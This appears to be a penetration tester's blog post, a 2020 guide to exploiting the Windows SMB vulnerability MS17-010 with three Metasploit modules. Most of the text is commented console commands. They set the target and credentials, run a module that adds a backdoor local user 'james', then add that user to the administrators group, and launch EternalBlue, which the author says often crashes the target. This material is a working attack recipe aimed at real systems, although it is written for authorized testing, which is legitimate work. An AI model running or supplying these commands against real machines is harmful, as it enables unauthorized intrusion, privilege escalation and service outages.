A Guide to Exploiting MS17-010 With Metasploit - 2020 Edition

One of the articles that I have written that got the most traction was the one regarding exploiting MS17-010 with Metasploit back in 2017. Well, things have changed, tools have changed, and methods have changed. Because of that, consider this the 2020 edition of that post.

Metasploit has released three (3) modules that can exploit this and are commonly used. I have listed the modules in order of most reliable to least reliable.

  1. use exploit/windows/smb/ms17 _ 010 _ psexec with credentials

  2. use auxiliary/admin/smb/ms17_ 010 _ command

  3. use exploit/windows/smb/ms17_ 010 _ eternalblue

I’ll go into detail using each of the above as examples.

ms17_010_psexec with credentials

This module is by far the most reliable, however you do need credentials on the machine. Some use cases for this are the following.

  1. You have regular domain user credentials on the network and want to get admin on a machine.

  2. You have local user credentials for the machine and want to get admin

  3. You want to validate the vulnerability exists using a stable exploit

Steps for using this exploit

msfconsole // fires up metasploit

use exploit/windows/smb/ms17_010_psexec // loads the metasploit module

set smbuser jsmith // sets the username when authenticating to the machine

set smbpass Password1 // sets the password for the user

set smbdomain CORP // sets the domain to use. If this is a local account, use WORKGROUP or WORKSTATION as this value.

set RHOST <IP ADDRESS> // this sets the IP address of the target machine. You need to replace IP <IP ADDRESS> with the IP address of the target system

run // this executes the command

The above exploit will work in almost all scenarios where the machine is vulnerable. This is the most reliable way to exploit MS17-010 on a machine.

ms17_010_command

This is the exploit I use in most cases as I don’t have any credentials and need to exploit a machine that I have found to be vulnerable. The commands to get this to work are the following.

use auxiliary/admin/smb/ms17_010_command // loads the metasploit module

set CMD net user james Password1 /add // adds the local user of “james” to the machine

set RHOST <<IP ADDRESS>> // this sets the IP address of the target machine. You need to replace IP <IP ADDRESS> with the IP address of the target system

run // this executes the command

Once this is run successfully, we will need to use this command again to change the local user we just created (james) to a local administrator. This can be done using the following commands.

set CMD net localgroup administrators james /add

Once this is done, we can use psexec, crackmapexec, RDP, etc. to gain access to the machine!

ms17_010_eternalblue

This is the ugly stepchild of MS17-010 exploits. Very flaky, high risk of crashing the SMB service on the machine. Alas, if you’re feeling lucky, this is what you need to do.

use exploit windows/smb/ms17_010_eternalblue // loads the Metasploit module

set RHOST <<IP ADDRESS>> // this sets the IP address of the target machine. You need to replace IP <IP ADDRESS> with the IP address of the target system

run // this executes the command

Chances are if you did not get a shell, you crashed the machine.

Previous
Previous

New Vulnerability - MOTU AVB Directory Traversal

Next
Next

Introduction to “Zoom” Bombing Video Conferencing Bombing